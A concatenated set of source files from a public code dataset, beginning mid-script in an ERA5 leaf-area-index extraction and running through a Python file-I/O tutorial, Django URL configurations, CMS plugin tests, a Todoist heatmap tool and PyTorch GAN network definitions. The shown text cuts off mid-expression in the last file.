lai_low_era5[orig_var1][:int(sacksEnd[xlat, ylon]), xlat, ylon]\n \n cur_lai_high1 = lai_high_era5_last_year[orig_var2][int(sacksStart[xlat, ylon]):, xlat, ylon]\n cur_lai_high2 = lai_high_era5[orig_var2][:int(sacksEnd[xlat, ylon]), xlat, ylon]\n\n cur_lai_low = np.concatenate([cur_lai_low1, cur_lai_low2]) * era5_low_veg.cvl.values[xlat, ylon]\n cur_lai_high = np.concatenate([cur_lai_high1, cur_lai_high2]) * era5_high_veg.cvh.values[xlat, ylon]\n\n if len(cur_lai_low) > 0 and len(cur_lai_high) > 0:\n yearly_grow_lai_low_mean[xlat, ylon] = np.nanmean(cur_lai_low)\n yearly_grow_lai_high_mean[xlat, ylon] = np.nanmean(cur_lai_high)\n n += 1\n \n\n # NORTHERN HEMISPHERE - SIMPLER, JUST NEED 1 YEAR OF ERA5\n else:\n cur_lai_low = lai_low_era5[orig_var1][int(sacksStart[xlat, ylon]):int(sacksEnd[xlat, ylon]), xlat, ylon]\n cur_lai_high = lai_high_era5[orig_var2][int(sacksStart[xlat, ylon]):int(sacksEnd[xlat, ylon]), xlat, ylon]\n \n if len(cur_lai_low) > 0 and len(cur_lai_high) > 0:\n yearly_grow_lai_low_mean[xlat, ylon] = np.nanmean(cur_lai_low) * era5_low_veg.cvl.values[xlat, ylon]\n yearly_grow_lai_high_mean[xlat, ylon] = np.nanmean(cur_lai_high) * era5_high_veg.cvh.values[xlat, ylon]\n \n n += 1\n\nprint('renaming dims...')\n\n# SAVE THE EXTRACTED TEMP DATA\nda_grow_lai_mean = xr.DataArray(data = yearly_grow_lai_low_mean + yearly_grow_lai_high_mean, \n dims = ['lat', 'lon'],\n coords = {'time': year, 'lat':lai_low_era5.lat, 'lon':lai_low_era5.lon},\n attrs = {'units' : 'LAI'\n })\nds_grow_lai_mean = xr.Dataset()\nds_grow_lai_mean['lai_grow_mean'] = da_grow_lai_mean\n\nprint('saving netcdf...')\nds_grow_lai_mean.to_netcdf('era5/growing_season/era5_%s_lai_grow_mean_global_%d_fixed_sh.nc'%(crop, year))\n\n\n\nda_grow_lai_low = xr.DataArray(data = yearly_grow_lai_low_mean, \n dims = ['lat', 'lon'],\n coords = {'time': year, 'lat':lai_low_era5.lat, 'lon':lai_low_era5.lon},\n attrs = {'units' : 'LAI'\n })\nds_grow_lai_low = xr.Dataset()\nds_grow_lai_low['lai_grow_mean'] = da_grow_lai_low\n\nprint('saving netcdf...')\nds_grow_lai_low.to_netcdf('era5/growing_season/era5_%s_lai_low_grow_mean_global_%d_fixed_sh.nc'%(crop, year))\n\n\n\n\nda_grow_lai_high = xr.DataArray(data = yearly_grow_lai_high_mean, \n dims = ['lat', 'lon'],\n coords = {'time': year, 'lat':lai_high_era5.lat, 'lon':lai_high_era5.lon},\n attrs = {'units' : 'LAI'\n })\nds_grow_lai_high = xr.Dataset()\nds_grow_lai_high['lai_grow_mean'] = da_grow_lai_high\n\nprint('saving netcdf...')\nds_grow_lai_high.to_netcdf('era5/growing_season/era5_%s_lai_high_grow_mean_global_%d_fixed_sh.nc'%(crop, year))\n","repo_name":"ecoffel/2020-ag-cmip6","sub_path":"ag6_extract_era5_grow_lai.py","file_name":"ag6_extract_era5_grow_lai.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"4677205056","text":"# 对文本数据进行读写操作,但不同的文本,有不同的编码\n# open()配合rt模块\nwith open(\"myFile.txt\", encoding='utf-8') as f:\n date=f.read()\n print(date)\n\nwith open('myFile.txt', 'rt', encoding='utf-8') as f:\n for line in f:\n print(line)\n\n# 写入操作 wt 模块 会清除原先的文本,并写入\n\n\n# 文件结尾追加内容 at模块\nwith open('myFile.txt', 'at', encoding='utf-8') as f:\n f.write('//////')\n print(f)\n\n# with会为使用的文件创建一个上下文环境,当程序离开这个with语句块时,文件会自动关闭\n\n#关于换行符 unix和windows是不相同的,\\n \\r\\n python默认是通用换行符\\n 如果不想换行 可以主动通过newline参数声明换行符","repo_name":"loser188/python_text","sub_path":"python/RHP/pythoncodebook/file&IO/读写文本数据51.py","file_name":"读写文本数据51.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"55505352","text":"\"\"\"config URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom api.views import home\nfrom employee.views import login, loginpage, logoutuser\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/', include(\"api.urls\")),\n path('', home, name='home'),\n path('addproduct/', include(\"manifactured_product.urls\")),\n\n path('addclients/', include(\"client.urls\")),\n\n #path('login/', login, name='login'),\n path('loginpage/', loginpage, name='loginpage'), \n path('logoutuser/', logoutuser, name='logoutuser'), \n \n #path('loginuser/', include(\"employee.urls\")),\n #path('logout/', include(\"employee.urls\")),\n \n path('order/', include(\"order.urls\")),\n]\n","repo_name":"Tolq1n/Qualification-work","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29831279305","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.test import override_settings\nfrom cms.api import add_plugin, create_page\nfrom cms.utils.plugins import build_plugin_tree\nfrom cmsplugin_cascade.bootstrap3.container import (BootstrapContainerPlugin, BootstrapRowPlugin,\n BootstrapColumnPlugin)\nfrom cmsplugin_cascade.bootstrap3.accordion import (BootstrapAccordionPlugin,\n BootstrapAccordionPanelPlugin)\nfrom cmsplugin_cascade.bootstrap3 import settings\nfrom cms.test_utils.testcases import CMSTestCase\nfrom .utils import get_request_context\n\nBS3_BREAKPOINT_KEYS = list(tp[0] for tp in settings.CMSPLUGIN_CASCADE['bootstrap3']['breakpoints'])\n\n\nclass AccordionPluginTest(CMSTestCase):\n def setUp(self):\n page = create_page('HOME', 'testing.html', 'en', published=True, in_navigation=True)\n self.placeholder = page.placeholders.get(slot='Main Content')\n self.request = self.get_request(language='en', page=page)\n self.admin_site = admin.sites.AdminSite()\n\n def build_accordion_plugins(self):\n # create container\n container_model = add_plugin(self.placeholder, BootstrapContainerPlugin, 'en',\n glossary={'breakpoints': BS3_BREAKPOINT_KEYS})\n container_plugin = container_model.get_plugin_class_instance(self.admin_site)\n self.assertIsInstance(container_plugin, BootstrapContainerPlugin)\n\n # add one row\n row_model = add_plugin(self.placeholder, BootstrapRowPlugin, 'en', target=container_model,\n glossary={})\n row_plugin = row_model.get_plugin_class_instance()\n self.assertIsInstance(row_plugin, BootstrapRowPlugin)\n\n # add one column\n column_model = add_plugin(self.placeholder, BootstrapColumnPlugin, 'en', target=row_model,\n glossary={'xs-column-width': 'col-xs-12', 'sm-column-width': 'col-sm-6',\n 'md-column-width': 'col-md-4', 'lg-column-width': 'col-lg-3'})\n column_plugin = column_model.get_plugin_class_instance()\n self.assertIsInstance(column_plugin, BootstrapColumnPlugin)\n\n # add accordion plugin\n accordion_model = add_plugin(self.placeholder, BootstrapAccordionPlugin, 'en', target=column_model)\n accordion_plugin = accordion_model.get_plugin_class_instance(self.admin_site)\n self.assertIsInstance(accordion_plugin, BootstrapAccordionPlugin)\n accordion_plugin.cms_plugin_instance = accordion_model.cmsplugin_ptr\n\n # add accordion panel\n panel_model = add_plugin(self.placeholder, BootstrapAccordionPanelPlugin, 'en',\n target=accordion_model, glossary={'panel_type': \"panel-danger\", 'panel_title': \"Foo\"})\n panel_plugin = panel_model.get_plugin_class_instance(self.admin_site)\n self.assertIsInstance(panel_plugin, BootstrapAccordionPanelPlugin)\n panel_plugin.cms_plugin_instance = panel_model.cmsplugin_ptr\n\n # render the plugins\n plugin_list = [container_model, row_model, column_model, accordion_model, panel_model]\n build_plugin_tree(plugin_list)\n context = get_request_context(self.request)\n\n self.assertEqual(accordion_plugin.get_identifier(accordion_model), 'with 1 panel')\n self.assertEqual(panel_plugin.get_identifier(panel_model), 'Foo')\n\n return container_model.render_plugin(context)\n\n @override_settings()\n def test_bootstrap_accordion(self):\n try:\n del settings.CMSPLUGIN_CASCADE['bootstrap3']['template_basedir']\n except KeyError:\n pass\n html = self.build_accordion_plugins()\n #print html\n soup = BeautifulSoup(html)\n panel_group = soup.find('div', class_='panel-group')\n self.assertIsNotNone(panel_group)\n\n @override_settings()\n def test_angular_bootstrap_accordion(self):\n settings.CMSPLUGIN_CASCADE['bootstrap3'].update({'template_basedir': 'angular-ui'})\n html = self.build_accordion_plugins()\n #print html\n soup = BeautifulSoup(html)\n accordion = soup.find('accordion')\n self.assertIsNotNone(accordion)\n","repo_name":"ReyhanehA/GDP32","sub_path":"79009_test_accordion.py_C__Users_user_Desktop_data_2_data_google_data_jrief_djangocms-cascade_tests.py","file_name":"79009_test_accordion.py_C__Users_user_Desktop_data_2_data_google_data_jrief_djangocms-cascade_tests.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21300277863","text":"from dataclasses import dataclass\nfrom typing import Callable, cast\n\nfrom app.domain.shared.gateway import HoumerDbGateway, PlaceDbGateway\nfrom app.domain.stop.gateway import StopDbGateway\nfrom app.domain.visit.gateway import VisitDbGateway\nfrom app.adapters.database.repositories import houmer_repository, place_repository, visit_repository, stop_repository\n\n\n@dataclass(frozen=True)\nclass Dependencies:\n houmer_db_gateway: HoumerDbGateway\n place_db_gateway: PlaceDbGateway\n visit_db_gateway: VisitDbGateway\n stop_db_gateway: StopDbGateway\n\n\ndef _build_dependencies() -> Callable[[], Dependencies]:\n deps = Dependencies(\n houmer_db_gateway=cast(HoumerDbGateway, houmer_repository),\n place_db_gateway=cast(PlaceDbGateway, place_repository),\n visit_db_gateway=cast(VisitDbGateway, visit_repository),\n stop_db_gateway=cast(StopDbGateway, stop_repository),\n )\n\n def fn() -> Dependencies:\n return deps\n\n return fn\n\n\nget_dependencies = _build_dependencies()\n","repo_name":"yerko76/houmer-tracking-app","sub_path":"app/config/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24057546826","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path(\"\", views.index), \n path(\"process_form\", views.process_form, name='process_form'),\n path('task_status/', views.task_status, name='task_status'),\n path('response/', views.view_response, name='response'),\n path('about/', views.about, name = \"about\"),\n path('response/error', views.error, name=\"error\"),\n path('response/generate-pdf/', views.generate_pdf, name='generate_pdf')\n]","repo_name":"mw74/csc394_group","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"69929831989","text":"from argparse import ArgumentParser, Action\nimport json\nimport numpy as np\nfrom datetime import date\nfrom math import ceil\n\nfrom contributist.connect import TodoistConnect\nfrom contributist.viz import plt_heatmap\n\nclass LoadConfig(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n with open(values[0], 'r', encoding='utf-8') as fp:\n cfg = json.load(fp)\n for k, v in cfg.items():\n setattr(namespace, k, v)\n\n\nWEEKDAYS = ['Monday', 'Tuesday', 'Wednesday',\n 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\nparser = ArgumentParser()\nparser.add_argument('--config', '-c', action=LoadConfig, nargs=1, required=True)\nparser.add_argument('--days', '-d', type=int, nargs='?', default=28)\nargs = parser.parse_args()\n\nconnection = TodoistConnect(args.token, args.weight_tags, args.default_weight)\nconnection.connect()\n\nweights = connection[:args.days]\ntoday = date.today()\nweekday = today.weekday()\n_, isoweek, _ = today.isocalendar()\nweeks = list(range(ceil((args.days + weekday) / len(WEEKDAYS))))\n\n\ndef week_slice(week):\n start = week * len(WEEKDAYS) - weekday\n return slice(max(0, start), start + 7)\n\n\nheat_matrix = [weights[week_slice(week)] for week in weeks]\n# Front-pad missing days as zero for first week\nheat_matrix[0] = [0] * weekday + heat_matrix[0]\n# Tail-pad missing days as zero for last week\nheat_matrix[-1] = heat_matrix[-1] + [0] * \\\n max(0, len(WEEKDAYS) - len(heat_matrix[-1]))\n\nplt_heatmap(np.array(heat_matrix),\n list(map(lambda d: d[:2], WEEKDAYS)), # only show first two letters\n list(map(lambda w: w + isoweek, weeks))) # display week number on y axis\n","repo_name":"felixlinker/contributist","sub_path":"contributist/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42183452645","text":"import torch\nimport os\nimport math\nimport torch.nn as nn\nfrom torch.nn import init\nimport functools\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.utils.serialization import load_lua\nfrom lib.nn import SynchronizedBatchNorm2d as SynBN2d\n\n\n###############################################################################\n# Functions\n###############################################################################\n\ndef pad_tensor(input):\n height_org, width_org = input.shape[2], input.shape[3]\n divide = 16\n\n if width_org % divide != 0 or height_org % divide != 0:\n\n width_res = width_org % divide\n height_res = height_org % divide\n if width_res != 0:\n width_div = divide - width_res\n pad_left = int(width_div / 2)\n pad_right = int(width_div - pad_left)\n else:\n pad_left = 0\n pad_right = 0\n\n if height_res != 0:\n height_div = divide - height_res\n pad_top = int(height_div / 2)\n pad_bottom = int(height_div - pad_top)\n else:\n pad_top = 0\n pad_bottom = 0\n\n padding = nn.ReflectionPad2d((pad_left, pad_right, pad_top, pad_bottom))\n input = padding(input)\n else:\n pad_left = 0\n pad_right = 0\n pad_top = 0\n pad_bottom = 0\n\n height, width = input.data.shape[2], input.data.shape[3]\n assert width % divide == 0, 'width cant divided by stride'\n assert height % divide == 0, 'height cant divided by stride'\n\n return input, pad_left, pad_right, pad_top, pad_bottom\n\n\ndef pad_tensor_back(input, pad_left, pad_right, pad_top, pad_bottom):\n height, width = input.shape[2], input.shape[3]\n return input[:, :, pad_top: height - pad_bottom, pad_left: width - pad_right]\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm2d') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\ndef get_norm_layer(norm_type='instance'):\n if norm_type == 'batch':\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True)\n elif norm_type == 'instance':\n norm_layer = functools.partial(nn.InstanceNorm2d, affine=False)\n elif norm_type == 'synBN':\n norm_layer = functools.partial(SynBN2d, affine=True)\n else:\n raise NotImplementedError('normalization layer [%s] is not found' % norm)\n return norm_layer\n\n\ndef define_network(which_model_netG,gpu_ids=[]):\n net = None\n use_gpu = len(gpu_ids) > 0\n\n if use_gpu:\n assert (torch.cuda.is_available())\n\n if which_model_netG == 'CSDNet_UPE' or which_model_netG == 'CSDNet_LOL':\n from .CSDNet import CSDNet\n net = CSDNet()\n elif which_model_netG == 'LiteCSDNet_UPE' or which_model_netG == 'LiteCSDNet_LOL':\n from .LiteCSDNet import LiteCSDNet\n net = LiteCSDNet()\n elif which_model_netG == 'SLiteCSDNet_UPE' or which_model_netG == 'SLiteCSDNet_LOL':\n from .SLiteCSDNet import SLiteCSDNet\n net = SLiteCSDNet()\n elif which_model_netG == 'CSDGAN':\n from .CSDGAN import CSDGAN\n net = CSDGAN()\n else:\n raise NotImplementedError('The model of the network [%s] is not recognized' % which_model_netG)\n if len(gpu_ids) > 0:\n net.cuda(device=gpu_ids[0])\n net = torch.nn.DataParallel(net, gpu_ids)\n net.apply(weights_init)\n return net\n\n\ndef define_D(input_nc, ndf, which_model_netD,\n n_layers_D=3, norm='batch', use_sigmoid=False, gpu_ids=[], patch=False):\n netD = None\n use_gpu = len(gpu_ids) > 0\n norm_layer = get_norm_layer(norm_type=norm)\n\n if use_gpu:\n assert (torch.cuda.is_available())\n if which_model_netD == 'basic':\n netD = NLayerDiscriminator(input_nc, ndf, n_layers=3, norm_layer=norm_layer, use_sigmoid=use_sigmoid,\n gpu_ids=gpu_ids)\n elif which_model_netD == 'n_layers':\n netD = NLayerDiscriminator(input_nc, ndf, n_layers_D, norm_layer=norm_layer, use_sigmoid=use_sigmoid,\n gpu_ids=gpu_ids)\n elif which_model_netD == 'no_norm':\n netD = NoNormDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids)\n elif which_model_netD == 'no_norm_4':\n netD = NoNormDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids)\n elif which_model_netD == 'no_patchgan':\n netD = FCDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids, patch=patch)\n elif which_model_netD == 'attention_D':\n netD = NoNormAttentionDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids)\n else:\n raise NotImplementedError('Discriminator model name [%s] is not recognized' %\n which_model_netD)\n if use_gpu:\n netD.cuda(device=gpu_ids[0])\n netD = torch.nn.DataParallel(netD, gpu_ids)\n netD.apply(weights_init)\n return netD\n\n\ndef print_network(net):\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\n\n##############################################################################\n# Classes\n##############################################################################\n\n\n# Defines the GAN loss which uses either LSGAN or the regular GAN.\n# When LSGAN is used, it is basically same as MSELoss,\n# but it abstracts away the need to create the target label tensor\n# that has the same size as the input\nclass GANLoss(nn.Module):\n def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0,\n tensor=torch.FloatTensor):\n super(GANLoss, self).__init__()\n self.real_label = target_real_label\n self.fake_label = target_fake_label\n self.real_label_var = None\n self.fake_label_var = None\n self.Tensor = tensor\n if use_lsgan:\n self.loss = nn.MSELoss()\n else:\n self.loss = nn.BCELoss()\n\n def get_target_tensor(self, input, target_is_real):\n target_tensor = None\n if target_is_real:\n create_label = ((self.real_label_var is None) or\n (self.real_label_var.numel() != input.numel()))\n if create_label:\n real_tensor = self.Tensor(input.size()).fill_(self.real_label)\n self.real_label_var = Variable(real_tensor, requires_grad=False)\n target_tensor = self.real_label_var\n else:\n create_label = ((self.fake_label_var is None) or\n (self.fake_label_var.numel() != input.numel()))\n if create_label:\n fake_tensor = self.Tensor(input.size()).fill_(self.fake_label)\n self.fake_label_var = Variable(fake_tensor, requires_grad=False)\n target_tensor = self.fake_label_var\n return target_tensor\n\n def __call__(self, input, target_is_real):\n target_tensor = self.get_target_tensor(input, target_is_real)\n return self.loss(input, target_tensor)\n\n\nclass DiscLossWGANGP():\n def __init__(self):\n self.LAMBDA = 10\n\n def name(self):\n return 'DiscLossWGAN-GP'\n\n def initialize(self, opt, tensor):\n # DiscLossLS.initialize(self, opt, tensor)\n self.LAMBDA = 10\n\n # def get_g_loss(self, net, realA, fakeB):\n # # First, G(A) should fake the discriminator\n # self.D_fake = net.forward(fakeB)\n # return -self.D_fake.mean()\n\n def calc_gradient_penalty(self, netD, real_data, fake_data):\n alpha = torch.rand(1, 1)\n alpha = alpha.expand(real_data.size())\n alpha = alpha.cuda()\n\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\n\n interpolates = interpolates.cuda()\n interpolates = Variable(interpolates, requires_grad=True)\n\n disc_interpolates = netD.forward(interpolates)\n\n gradients = torch.autograd.grad(outputs=disc_interpolates, inputs=interpolates,\n grad_outputs=torch.ones(disc_interpolates.size()).cuda(),\n create_graph=True, retain_graph=True, only_inputs=True)[0]\n\n gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * self.LAMBDA\n return gradient_penalty\n\n\n# Defines the generator that consists of Resnet blocks between a few\n# downsampling/upsampling operations.\n# Code and idea originally from Justin Johnson's architecture.\n# https://github.com/jcjohnson/fast-neural-style/\nclass ResnetGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6,\n gpu_ids=[], padding_type='reflect'):\n assert (n_blocks >= 0)\n super(ResnetGenerator, self).__init__()\n self.input_nc = input_nc\n self.output_nc = output_nc\n self.ngf = ngf\n self.gpu_ids = gpu_ids\n\n model = [nn.ReflectionPad2d(3),\n nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0),\n norm_layer(ngf),\n nn.ReLU(True)]\n\n n_downsampling = 2\n for i in range(n_downsampling):\n mult = 2 ** i\n model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3,\n stride=2, padding=1),\n norm_layer(ngf * mult * 2),\n nn.ReLU(True)]\n\n mult = 2 ** n_downsampling\n for i in range(n_blocks):\n model += [\n ResnetBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer, use_dropout=use_dropout)]\n\n for i in range(n_downsampling):\n mult = 2 ** (n_downsampling - i)\n model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2),\n kernel_size=3, stride=2,\n padding=1, output_padding=1),\n norm_layer(int(ngf * mult / 2)),\n nn.ReLU(True)]\n model += [nn.ReflectionPad2d(3)]\n model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]\n model += [nn.Tanh()]\n\n self.model = nn.Sequential(*model)\n\n def forward(self, input):\n if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):\n return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n else:\n return self.model(input)\n\n\n# Define a resnet block\nclass ResnetBlock(nn.Module):\n def __init__(self, dim, padding_type, norm_layer, use_dropout):\n super(ResnetBlock, self).__init__()\n self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout)\n\n def build_conv_block(self, dim, padding_type, norm_layer, use_dropout):\n conv_block = []\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p),\n norm_layer(dim),\n nn.ReLU(True)]\n if use_dropout:\n conv_block += [nn.Dropout(0.5)]\n\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p),\n norm_layer(dim)]\n\n return nn.Sequential(*conv_block)\n\n def forward(self, x):\n out = x + self.conv_block(x)\n return out\n\n\n# Defines the Unet generator.\n# |num_downs|: number of downsamplings in UNet. For example,\n# if |num_downs| == 7, image of size 128x128 will become of size 1x1\n# at the bottleneck\nclass UnetGenerator(nn.Module):\n def __init__(self, input_nc, output_nc, num_downs, ngf=64,\n norm_layer=nn.BatchNorm2d, use_dropout=False, gpu_ids=[], skip=False, opt=None):\n super(UnetGenerator, self).__init__()\n self.gpu_ids = gpu_ids\n self.opt = opt\n # currently support only input_nc == output_nc\n assert (input_nc == output_nc)\n\n # construct unet structure\n unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, norm_layer=norm_layer, innermost=True, opt=opt)\n for i in range(num_downs - 5):\n unet_block = UnetSkipConnectionBlock(ngf * 8, ngf * 8, unet_block, norm_layer=norm_layer,\n use_dropout=use_dropout, opt=opt)\n unet_block = UnetSkipConnectionBlock(ngf * 4, ngf * 8, unet_block, norm_layer=norm_layer, opt=opt)\n unet_block = UnetSkipConnectionBlock(ngf * 2, ngf * 4, unet_block, norm_layer=norm_layer, opt=opt)\n unet_block = UnetSkipConnectionBlock(ngf, ngf * 2, unet_block, norm_layer=norm_layer, opt=opt)\n unet_block = UnetSkipConnectionBlock(output_nc, ngf, unet_block, outermost=True, norm_layer=norm_layer, opt=opt)\n\n if skip == True:\n skipmodule = SkipModule(unet_block, opt)\n self.model = skipmodule\n else:\n self.model = unet_block\n\n def forward(self, input):\n if self.gpu_ids and isinstance(input.data, torch.cuda.FloatTensor):\n return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n else:\n return self.model(input)\n\n\nclass SkipModule(nn.Module):\n def __init__(self, submodule, opt):\n super(SkipModule, self).__init__()\n self.submodule = submodule\n self.opt = opt\n\n def forward(self, x):\n latent = self.submodule(x)\n return self.opt.skip * x + latent, latent\n\n\n# Defines the submodule with skip connection.\n# X -------------------identity---------------------- X\n# |-- downsampling -- |submodule| -- upsampling --|\nclass UnetSkipConnectionBlock(nn.Module):\n def __init__(self, outer_nc, inner_nc,\n submodule=None, outermost=False, innermost=False, norm_layer=nn.BatchNorm2d, use_dropout=False,\n opt=None):\n super(UnetSkipConnectionBlock, self).__init__()\n self.outermost = outermost\n\n downconv = nn.Conv2d(outer_nc, inner_nc, kernel_size=4,\n stride=2, padding=1)\n downrelu = nn.LeakyReLU(0.2, True)\n downnorm = norm_layer(inner_nc)\n uprelu = nn.ReLU(True)\n upnorm = norm_layer(outer_nc)\n\n if opt.use_norm == 0:\n if outermost:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downconv]\n up = [uprelu, upconv, nn.Tanh()]\n model = down + [submodule] + up\n elif innermost:\n upconv = nn.ConvTranspose2d(inner_nc, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downrelu, downconv]\n up = [uprelu, upconv]\n model = down + up\n else:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downrelu, downconv]\n up = [uprelu, upconv]\n\n if use_dropout:\n model = down + [submodule] + up + [nn.Dropout(0.5)]\n else:\n model = down + [submodule] + up\n else:\n if outermost:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downconv]\n up = [uprelu, upconv, nn.Tanh()]\n model = down + [submodule] + up\n elif innermost:\n upconv = nn.ConvTranspose2d(inner_nc, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downrelu, downconv]\n up = [uprelu, upconv, upnorm]\n model = down + up\n else:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n down = [downrelu, downconv, downnorm]\n up = [uprelu, upconv, upnorm]\n\n if use_dropout:\n model = down + [submodule] + up + [nn.Dropout(0.5)]\n else:\n model = down + [submodule] + up\n\n self.model = nn.Sequential(*model)\n\n def forward(self, x):\n if self.outermost:\n return self.model(x)\n else:\n return torch.cat([self.model(x), x], 1)\n\n\n# Defines the PatchGAN discriminator with the specified arguments.\nclass NLayerDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, use_sigmoid=False, gpu_ids=[]):\n super(NLayerDiscriminator, self).__init__()\n self.gpu_ids = gpu_ids\n\n kw = 4\n padw = int(np.ceil((kw - 1) / 2))\n sequence = [\n nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=1, padding=padw),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n\n if use_sigmoid:\n sequence += [nn.Sigmoid()]\n\n self.model = nn.Sequential(*sequence)\n\n def forward(self, input):\n # if len(self.gpu_ids) and isinstance(input.data, torch.cuda.FloatTensor):\n # return nn.parallel.data_parallel(self.model, input, self.gpu_ids)\n # else:\n return self.model(input)\n\n\nclass NoNormDiscriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, use_sigmoid=False, gpu_ids=[]):\n super(NoNormDiscriminator, self).__init__()\n self.gpu_ids = gpu_ids\n\n kw = 4\n padw = int(np.ceil((kw - 1) / 2))\n sequence = [\n nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 